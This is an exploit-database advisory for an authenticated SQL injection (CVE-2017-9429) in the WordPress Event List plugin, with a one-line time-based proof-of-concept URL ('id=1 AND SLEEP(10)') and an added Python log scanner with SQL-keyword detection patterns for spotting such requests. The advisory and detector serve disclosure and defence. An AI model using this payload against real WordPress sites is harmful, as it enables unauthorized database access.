WordPress Plugin Event List < 0.7.8 - SQL Injection

Reported by Dimitrios Tsagkarakis, 04 Jun 2017. Type: exploitdb (www.exploit-db.com)

WordPress Plugin Event List SQL Injection vulnerability version 0.7.

Related

Packet Storm: WordPress Event List 0.7.8 SQL Injection (13 Jun 2017)
NVD: CVE-2017-9429 (13 Jun 2017)
CVE: CVE-2017-9429 (13 Jun 2017)
Cvelist: CVE-2017-9429 (13 Jun 2017)
0day.today: WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability (14 Jun 2017)
Prion: Sql injection (13 Jun 2017)
WPVulnDB: Event List <= 0.7.8 - Authenticated SQL Injection (4 Jun 2017)
Patchstack: WordPress Event List plugin <=0.7.8 - SQL Injection vulnerability (4 Jun 2017)
exploitpack: WordPress Plugin Event List 0.7.8 - SQL Injection (4 Jun 2017)

# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu 
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps

1. Description:

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.

2. Proof of Concept:

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

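As an added defender-side example (not part of the advisory or the plugin), the following Python script scans web-server access logs for requests to the Event List admin page whose id parameter is not a plain integer, which is the request shape the proof of concept above produces. The log lines, field layout, usernames and IP addresses are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in combined log format (assumed layout, not from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - admin [04/Jun/2017:10:12:01 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - admin [04/Jun/2017:10:12:07 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1%20AND%20SLEEP(10) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - editor [04/Jun/2017:10:13:00 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=12 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
198.51.100.7 - editor [04/Jun/2017:10:13:09 +0000] "GET /wp-admin/edit.php?post_type=page&id=1' HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Minimal parser for combined log format: client IP, auth user, timestamp, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
# Tokens that should never appear in a numeric record id.
SQL_HINT = re.compile(r"""\b(sleep|benchmark|union|select|and|or)\b|['"()#]|--|/\*""", re.IGNORECASE)


def check_request(path):
    """Return a reason string if the request targets the Event List admin
    page (page=el_admin_main) with a non-integer id parameter, else None."""
    url = urlparse(path)
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # parse_qs URL-decodes values
    if qs.get("page", [""])[0] != "el_admin_main":
        return None
    for value in qs.get("id", []):
        value = value.strip()
        if not value.isdigit():
            hint = "sql-keyword" if SQL_HINT.search(value) else "non-numeric"
            return f"{hint}: id={value!r}"
    return None


def scan_log(text):
    """Return (ip, user, timestamp, reason) for every suspicious request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = check_request(m["path"])
        if reason:
            findings.append((m["ip"], m["user"], m["ts"], reason))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the vulnerable page requires an authenticated user, the auth-user column in a finding identifies the account whose session was used, which is the first thing to check during triage.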

3. Solution:

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.

4. Reference:

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
